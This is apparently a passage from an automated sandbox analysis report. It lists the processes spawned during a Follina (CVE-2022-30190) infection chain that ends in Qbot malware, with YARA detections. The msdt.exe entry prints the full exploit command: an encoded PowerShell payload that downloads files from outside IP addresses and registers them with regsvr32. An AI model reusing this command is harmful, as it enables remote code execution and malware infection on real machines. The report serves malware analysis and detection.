                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:466688 bytes
                                                                                                                                                                    MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:19:21:12
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:466688 bytes
                                                                                                                                                                    MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:19:21:20
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:1508352 bytes
                                                                                                                                                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.807640335.0000000003050000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.805909900.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.806003549.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation:moderate

Target ID:24
Start time:19:21:30
Start date:07/06/2022
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0xc20000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:28
Start time:19:22:05
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
Imagebase:0xb40000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:29
Start time:19:22:08
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
Imagebase:0x1090000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:30
Start time:19:22:11
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
Imagebase:0xb40000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:32
Start time:19:22:14
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
Imagebase:0x1090000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:38
Start time:19:22:39
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Imagebase:0x12f0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Target ID:39
Start time:19:22:40
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Imagebase:0x12f0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Target ID:40
Start time:19:22:41
Start date:07/06/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Imagebase:0x12f0000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Target ID:41
Start time:19:22:56
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
Imagebase:0xb40000
File size:2170976 bytes
MD5 hash:350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

Target ID:43
Start time:19:23:13
Start date:07/06/2022
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
Imagebase:0x1090000
File size:43176 bytes
MD5 hash:C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

No disassembly